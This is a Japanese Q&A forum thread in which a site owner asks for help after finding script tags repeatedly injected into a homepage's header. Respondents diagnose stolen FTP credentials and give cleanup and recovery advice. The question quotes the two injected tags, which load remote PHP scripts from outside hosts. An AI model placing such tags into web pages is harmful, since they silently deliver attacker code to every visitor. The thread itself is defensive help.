• ベストアンサー

スパイウェアーでしょうか

新しく立ち上げたホームページにアクセスした方から ウィルス対策ソフトから「スパイウェアー」の警告が発せられたとのこと。 調べたところ、ヘッダのある部分に、問題があるようです。 次のような記述がありました。 <script src=http://vinnarodds.se/includes/CREDITS.php></script> ここにアクセスしてみたら「//」のみでなにもありません。 もちろんこちらで作成した時点ではこれらの記述はありません。 SPYPOTスキャンかけて駆除できたのかはわかりませんが 改めてアップロード上書きしてソースを調べるとその記述はありません。 が半日ぐらい後に調べるとまた加えられています。 3日後にその記述が別の内容に変わってました。 <script src=http://mellis-networld.de/wohnung/Horoskop_Hp3.php ></script> これはどう見てもヘッダの記述とは思えずスパイウェアーだと思うのですが SPYPOTなどで削除できないようです。 どうしたらいいか詳しい方にアドバイスをおねがいします。 現在のところパソコンにはっきりとした被害などはありませんが ウインドウズXP pro SP3です。 あまり詳しくはないのですがセキュリティーは 「マイシールドV3」 「SPYPOT」 「Windows Defender」 を使用してます。

質問者が選んだベストアンサー

  • ベストアンサー
  • ryu-fiz
  • ベストアンサー率63% (2705/4228)
回答No.1

取り急ぎ、参考URLを。 【レポート】「あなたのウェブサイト、改ざんされていませんか?」 - IPAの2009年7月の「今月の呼びかけ」 | パソコン | マイコミジャーナル http://journal.mycom.co.jp/articles/2009/07/03/ipa7/index.html まずはftpアカウントのパスワード変更を試しに行ってみるべきでしょうか。その後で改めて改ざんされたソースを修正したものをアップし直す、と。 それでも改ざんがおさまらないとしたら…そちらのパソコンに何らかの感染が存在し、パスワードなどが漏れている可能性が高いです。パソコン内の感染がなくならない限り、サイトは一時閉鎖が妥当でしょう。 >あまり詳しくはないのですがセキュリティーは >「マイシールドV3」 「SPYPOT」 「Windows Defender」 >を使用してます。 これらだけでは検出出来ない感染も多数存在していると思われます。深刻な感染が確実視される場合の最も早くて確実な対処はリカバリだと思われます。あるいは、この質問を締め切った上でhigaitaisaku.comの質問掲示板に移動するのがよろしいかと思われます。 http://www.higaitaisaku.com/ どうしてもツールによる除去にこだわろうとするなら、Malwarebytes' Anti-MalwareやSUPERAntiSpywareの利用をお勧めします。参考URLです。 http://fine.tok2.com/home/heto2/0700SecurityApp/Malwarebytes/0001.htm http://fine.tok2.com/home/heto2/0700SecurityApp/SuperAntiSpy/mokuji.htm Windowsで安全にリカバリを進めるためには、次のURLを参考にしてください。 http://iwata.way-nifty.com/home/2004/10/1017.html XP SP3やVista、それ以降のOS搭載機に関しては、基本的にXP SP2と同様と考えてください。 なお、昨今の感染は手強くなっており、ウイルス対策ソフトで防ぐことが困難になっているものも増えています。ウイルス対策ソフトを入れて、怪しいサイトを見ないようにするだけでは防げない感染も少なからずあります。せめて次のサイトの初心者向けコンテンツくらいは理解しておくようにしてください。 国民のための情報セキュリティサイト http://www.soumu.go.jp/main_sosiki/joho_tsusin/security/index.htm XPにおいては、IEに依存しないFirefoxやOperaのようなブラウザを普段遣いにすることが望ましいと考えます。また、アプリケーションソフトのセキュリティ上の弱点=脆弱性をきちんと改善しておくことが、今回のような深刻な感染を防ぐ意味で非常に重要です。 そして、最新の脆弱性情報や感染の手口を知る意味でも、次のようなニュースサイトで毎日関連情報をチェックされるのが望ましいと思います。 http://www.itmedia.co.jp/enterprise/security/ http://internet.watch.impress.co.jp/

nobyosh
質問者

お礼

ryu-fiz様。 早速FTPのパスワードを変更して いろんなセキュリティーやクリーンアップを駆使し あらためてアップしました。 一日たちましたが新たな感染はないようです。 初めてのこういった経験でセキュリティーの認識不足を 痛感、勉強させられました。 ありがとうございました。

その他の回答 (1)

回答No.2

自分で作っているサーバーなら直ちに停止、レンタルサーバーやプロバイダーならホームページを停止後、その会社に直ちに連絡をし処理方法を尋ねる、を行ってください。他の方の回答のように外部から侵入されている可能性が大です。

nobyosh
質問者

お礼

アドバイスありがとうございました。

関連するQ&A

専門家に質問してみよう